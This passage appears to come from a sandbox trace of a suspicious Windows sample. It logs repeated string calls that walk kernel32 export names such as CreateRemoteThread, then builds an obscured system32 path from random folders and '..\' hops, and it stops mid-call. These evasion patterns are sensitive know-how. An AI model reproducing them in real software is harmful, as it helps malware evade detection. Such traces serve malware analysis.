lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.093] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.093] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.093] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.093] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.093] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.093] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.093] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.093] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.093] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.093] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.093] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.093] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.093] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.093] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.093] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.093] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.093] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.094] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.094] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.094] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.094] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.094] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.094] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.094] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.094] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.094] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.094] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.094] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.094] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.094] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.094] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.094] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.094] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.094] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.094] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.094] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.094] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.095] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.095] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.095] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.095] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.095] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.095] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.095] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.095] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.095] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.095] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.095] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.095] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.095] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.095] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.095] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.095] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.095] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.095] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.095] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.096] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.096] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.096] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.096] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.096] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.096] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.096] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.096] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.096] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.096] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.096] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.096] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.096] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.096] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.096] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.096] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.096] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.097] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.097] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.097] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.097] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.097] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.097] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.097] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.097] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.097] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.097] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.097] lstrlenA (lpString="DELETEATOM") returned 10 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.097] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.097] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.097] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.097] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.097] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.097] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.098] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.098] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.098] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.098] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.098] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.098] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.098] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.098] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.098] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.098] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.098] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.098] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.098] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.098] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.098] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.098] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.098] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.098] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.098] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.098] lstrcpyA (in: lpString1=0x239ec2c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.099] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.099] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.099] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.099] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.099] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.099] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.099] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.099] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.099] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.099] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.099] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.099] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.099] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.099] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.099] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.099] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.099] lstrcpyA (in: lpString1=0x239ec2c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\") returned="C:\\n\\rhrvs\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\") returned="C:\\n\\rhrvs\\..\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\" [0179.100] lstrcatW (in: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\", lpString2="..\\" | out: lpString1="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\") returned="C:\\n\\rhrvs\\..\\..\\Windows\\svw\\ci\\qgb\\..\\..\\..\\system32\\m\\d\\taj\\..\\" [0179.100] lstrcatW (in: 